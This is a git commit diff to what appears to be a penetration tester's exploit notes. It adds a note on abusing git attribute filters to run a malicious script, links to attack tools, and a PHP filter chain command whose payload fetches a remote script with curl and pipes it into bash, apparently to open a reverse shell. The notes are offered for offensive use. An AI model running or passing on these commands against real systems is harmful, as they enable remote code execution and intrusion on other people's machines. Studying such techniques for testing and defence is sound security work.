added git attributes exploit possibility

Exploits/Git/Git Attributes.md

@@ -0,0 +1,14 @@
+# Git Attributes
+
+[Git Attributes]( https://www.git-scm.com/docs/gitattributes) can be used to introduce scripts modifying files before pushing. That means the you can prepare a scripts for example linting by filtetype, and  call it via attributes afterwards.
+Therefore, you need to create an attributes file at `.git/info/attributes`. Insert something that makes sense, e.g.
+```sh
+echo "*.py filter=indent" > .git/info/attributes
+```
+
+reference the file as the filter via
+```sh
+git config filter.indent.clean /dev/shm/$MALICIOUS_FILE
+```
+
+Push to origin afterwards to trigger the filter file

Exploits/References.md

@@ -3,11 +3,13 @@
 [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings.git)
 
 ## Recover git Repositories
+
 [Internetwache's gitTools](https://github.com/internetwache/GitTools.git)
 
 ## Web
 
-[Padbuster - padding Oracle Attacks](https://github.com/AonCyberLabs/PadBuster.git)
+* [Padbuster - padding Oracle Attacks](https://github.com/AonCyberLabs/PadBuster.git)
+* [PHP Filter Chain Generator](https://github.com/synacktiv/php_filter_chain_generator.git)
 
 ### PHP
 

Exploits/Web/PHP Filer Chain.md

@@ -0,0 +1,7 @@
+# PHP Filter Chain Generator
+
+* [Get RCEs without uploading by chaining filters](https://github.com/synacktiv/php_filter_chain_generator)
+* Or by uploading a filtered file
+```sh
+./php_filter_chain_generator.py --chain '<?= `curl http://$TARGET_IP/rev.sh|bash` ;?>'
+```